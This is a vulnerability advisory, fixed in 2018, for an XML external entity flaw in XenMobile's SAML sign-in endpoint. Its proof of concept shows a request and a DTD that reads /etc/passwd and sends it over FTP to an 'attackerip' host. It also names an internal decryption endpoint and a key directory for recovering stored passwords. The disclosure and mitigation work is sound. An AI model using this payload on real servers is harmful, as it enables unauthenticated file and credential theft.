Advisory:

Xen Mobile allows attackers to read arbitrary files

Vulnerability

Last revised:

It is possible read most of the files and make network calls to private services on the Xen Mobile servers without authenticating.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 7.8 High
Vector Network
Complexity Low
Authentication None
Confidentiality Complete
Integrity None
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

It is possible read most of the files and make network calls to private sevices on the Xen Mobile servers without authenticating by exploiting a feature of XML External Entity (XXE) processing via the service’s SAML login functionality.

POST /aw/saml/signin/test HTTP/1.1
Host: xenmobile.example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xenmobile.example.com/index_uc.html
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8748

SAMLRequest=[long string of base64 encoded gzipped data]

The start of the base64 string decodes to

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE saml2p:Response [
<!ENTITY % remote SYSTEM "http://attackerip/attack.xml">

%remote;
]]>

This references a remote file on a server controled by the attacker:

<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#37; external SYSTEM "ftp://attackerip/%payload;" >'
>
%param1;
%external;

This causes the server that is processing the XML to read a URL, store the value in a variable and then make an additional request to the attacker’s server with this value included in the URL.

The URLs can be http://, https://, file:// or ftp://. FTP URLs can contain newline characters, so this method allows us read files on the server or make http requests to services inside or outside the firewall and then send the result back to an attacker. Any text file can be read as long as it does not contain a % character.

The server contains configuration files that contain encrypted passwords. There are two ways to decrypt the passwords: either by calling the internal REST API endpoint available at http://localhost:30000/sftu/crypto/dec or by downloading the files in /opt/sas/rt/keys and decrypting the passwords locally.

Advisory timeline

2018-03-28 – Reported to Citrix and acknowledged immediately

2018-05-21 – Issue reported fixed

Mitigation/further actions

  1. Create firewall rules to restrict outbound requests
  2. Log and monitor outbound requests from your network
  3. Monitor log files for XML errors
  4. Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
  5. Install an update rectifying this issue as soon as one is available